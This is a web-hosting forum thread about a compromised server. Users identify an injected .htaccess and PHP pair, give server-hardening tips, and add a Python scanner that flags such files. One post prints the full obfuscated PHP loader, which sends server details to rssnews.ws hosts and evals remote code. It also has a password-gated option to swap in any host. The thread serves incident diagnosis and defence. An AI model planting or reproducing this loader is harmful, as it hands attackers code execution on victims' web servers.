.htaccess & 223726.php

seachen

I found out that many files of this kind are created inside folders with permission 777.

.htaccess
223726.php

May I know if this is a Trojan?
 
Yes. Normally shopping cart / forum users have this problem.

I have edited the file, the code is as below:

Options -MultiViews
ErrorDocument 404 //images/90639.php

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cfce0606ccc6b275b49c4262f438effe") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
 
This code loads and shows advertisements from "ads.rssnews .ws" and "71.rssnews .ws".
Text from their site:
Code:
Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money !
 
It seems like it's not a script problem. It is my DirectAdmin problem.

Different scripts also have the same thing.
 
It's not a DirectAdmin problem in any event; DirectAdmin doesn't care about .htaccess or php files. Nor does it manage or care about your firewall.

Jeff
 
I think it may be my server security problem.

May I know any suggestions to make the server more secure?
 
Check Security Focus for one, and inform your clients to subscribe to any newsletters of the scripts they use, to find out about exploits and new versions.

You can, as a server admin:

do: ./build secure_php
do: Secure tmp (although most say it's somewhat useless)
do: chmod 700 (wget, lynx, etc), so root can only run them
do: install mod_security2
advice: install mod_ruid

Most of these are on this forum as tutorials.

Plus, if you are not comfortable with playing in SSH, consider hiring someone that is - I'll not be responsible if you break anything if you attempt to follow my advice yourself. Good luck.
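
An added triage example (not part of any post in this thread, and not DirectAdmin code): a Python scan of a web root for the pair described above, an .htaccess whose ErrorDocument points at a PHP script next to a numeric-named PHP file that calls eval and base64_decode, noting whether the directory is world-writable. The matching rules, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Heuristics derived from the two files quoted in the thread; they are
# assumptions for triage, not a complete malware signature set.
ERRORDOC_PHP = re.compile(rb"ErrorDocument\s+\d{3}\s+\S*\.php\b", re.I)
NUMERIC_PHP = re.compile(r"^\d+\.php$")
LOADER_CALLS = (b"eval(", b"base64_decode(")

def scan(webroot):
    """Return sorted (relative_path, reason, dir_is_world_writable) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        open_dir = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)
        for name in files:
            full = Path(dirpath, name)
            try:
                data = full.read_bytes()
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            if name == ".htaccess" and ERRORDOC_PHP.search(data):
                reason = "ErrorDocument routed to a PHP script"
            elif NUMERIC_PHP.match(name) and all(c in data for c in LOADER_CALLS):
                reason = "numeric-named PHP using eval + base64_decode"
            else:
                continue
            findings.append((os.path.relpath(full, webroot), reason, open_dir))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: a 777 directory with a dropped pair, plus clean files."""
    files = {
        "images/.htaccess": b"Options -MultiViews\nErrorDocument 404 /images/12345.php\n",
        "images/12345.php": b'<? $x = base64_decode("ZXhhbXBsZQ=="); eval($x); ?>',
        "shop/.htaccess": b"ErrorDocument 404 /notfound.html\n",
        "shop/index.php": b"<?php echo 'hello'; ?>",
    }
    for rel, body in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
    os.chmod(Path(root, "images"), 0o777)  # mimic the 777 folders from the first post

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print(*scan(root), sep="\n")
```

Legitimate applications sometimes route ErrorDocument to a PHP page, so treat hits as leads to review, with hits inside world-writable directories first.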
 